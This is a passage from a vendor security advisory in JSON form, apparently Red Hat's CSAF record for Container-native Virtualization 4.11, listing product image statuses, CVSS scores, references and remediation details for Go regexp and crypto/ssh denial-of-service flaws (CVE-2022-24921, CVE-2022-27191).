"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2064857"
}
],
"notes": [
{
"category": "description",
"text": "A stack overflow flaw was found in Golang\u0027s regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: regexp: stack exhaustion via a deeply nested expression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has been rated as a Moderate impact flaw because the exploitation of this flaw requires that an affected application accept arbitrarily long regexps from untrusted sources, which has inherent risks (even without this flaw), especially involving impacts to application availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-24921"
},
{
"category": "external",
"summary": "RHBZ#2064857",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064857"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-24921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24921"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-24921",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24921"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk",
"url": "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk"
}
],
"release_date": "2022-03-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: regexp: stack exhaustion via a deeply nested expression"
},
{
"cve": "CVE-2022-27191",
"cwe": {
"id": "CWE-327",
"name": "Use of a Broken or Risky Cryptographic Algorithm"
},
"discovery_date": "2022-03-16T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2064702"
}
],
"notes": [
{
"category": "description",
"text": "A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: crash in a golang.org/x/crypto/ssh server",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP) the vulnerable golang.org/x/crypto/ssh package is bundled in many components. The affected code is in the SSH server portion that is not used, hence the impact by this vulnerability is reduced. Additionally the OCP installer components, that also bundle vulnerable golang.org/x/crypto/ssh package, are used only during the cluster installation process, hence for already deployed and running OCP clusters the installer components are considered as affected by this vulnerability but not impacted.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
